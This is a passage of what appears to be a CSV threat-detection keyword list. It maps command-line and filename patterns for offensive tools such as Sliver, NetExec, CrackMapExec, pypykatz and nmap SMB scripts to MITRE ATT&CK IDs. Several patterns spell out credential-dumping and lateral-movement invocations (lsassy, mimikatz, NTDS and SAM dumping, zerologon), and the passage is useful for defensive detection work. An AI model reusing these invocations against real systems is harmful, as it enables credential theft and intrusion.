--skipregistryloggedon*",".{0,1000}\s\-\-skipregistryloggedon.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* skypev2-version.nse*",".{0,1000}\sskypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*----- SLEEP HOOK -----*",".{0,1000}\-\-\-\-\-\sSLEEP\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "* slip.py *",".{0,1000}\sslip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "* sliver sliver*",".{0,1000}\ssliver\ssliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver.exe*",".{0,1000}\ssliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver_pb2.py*",".{0,1000}\ssliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* sliver_pb2_grpc.py*",".{0,1000}\ssliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* sliver-client.exe*",".{0,1000}\ssliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* 
sliver-client_windows.exe*",".{0,1000}\ssliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows-386*.exe*",".{0,1000}\ssliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows-amd64*.exe*",".{0,1000}\ssliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows-arm64*.exe*",".{0,1000}\ssliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* smb * --dpapi *password*",".{0,1000}\ssmb\s.{0,1000}\s\-\-dpapi\s.{0,1000}password.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * --gen-relay-list *.txt*",".{0,1000}\ssmb\s.{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * --lsa --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-lsa\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -M lsassy*",".{0,1000}\ssmb\s.{0,1000}\s\-M\slsassy.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M masky -o CA=*",".{0,1000}\ssmb\s.{0,1000}\s\-M\smasky\s\-o\sCA\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M msol *",".{0,1000}\ssmb\s.{0,1000}\s\-M\smsol\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -M ntlmv1 *",".{0,1000}\ssmb\s.{0,1000}\s\-M\sntlmv1\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -M rdp -o ACTION=enable*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srdp\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security 
of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M runasppl*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srunasppl.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M zerologon*",".{0,1000}\ssmb\s.{0,1000}\s\-M\szerologon.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * --ntds --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-ntds\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * --sam --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-sam\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 
- TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -u * -p * * -M dfscoerce*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sdfscoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * * --rid-brute*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * * --shares --filter-shares *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-shares\s\-\-filter\-shares\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * * -X whoami --obfs*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M enum_av*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_av.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M enum_dns*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_dns.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M gpp_password*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sgpp_password.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M met_inject *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * --wmi ""select Name from win32_computersystem""*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-wmi\s\""select\sName\sfrom\swin32_computersystem\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb client * shares *use c$*",".{0,1000}\ssmb\sclient\s.{0,1000}\sshares\s.{0,1000}use\sc\$.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* smb -M mimikatz --options*",".{0,1000}\ssmb\s\-M\smimikatz\s\-\-options.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* smb shareenum *smb2+ntlm-password*",".{0,1000}\ssmb\sshareenum\s.{0,1000}smb2\+ntlm\-password.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* smb* -u '' -p ''*",".{0,1000}\ssmb.{0,1000}\s\-u\s\'\'\s\-p\s\'\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* SMB_Staging.c*",".{0,1000}\sSMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "* smb2-capabilities.nse*",".{0,1000}\ssmb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-security-mode.nse*",".{0,1000}\ssmb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -smb2support --interactive *",".{0,1000}\s\-smb2support\s\-\-interactive\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* smb2-time.nse*",".{0,1000}\ssmb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-vuln-uptime.nse*",".{0,1000}\ssmb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-brute.nse*",".{0,1000}\ssmb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-cmds.txt*",".{0,1000}\ssmb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* smb-double-pulsar-backdoor.nse*",".{0,1000}\ssmb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-domains.nse*",".{0,1000}\ssmb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-groups.nse*",".{0,1000}\ssmb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-processes.nse*",".{0,1000}\ssmb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-services.nse*",".{0,1000}\ssmb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-sessions.nse*",".{0,1000}\ssmb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-shares.nse*",".{0,1000}\ssmb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-users.nse*",".{0,1000}\ssmb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smbexec.py*",".{0,1000}\ssmbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* smb-flood.nse*",".{0,1000}\ssmb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
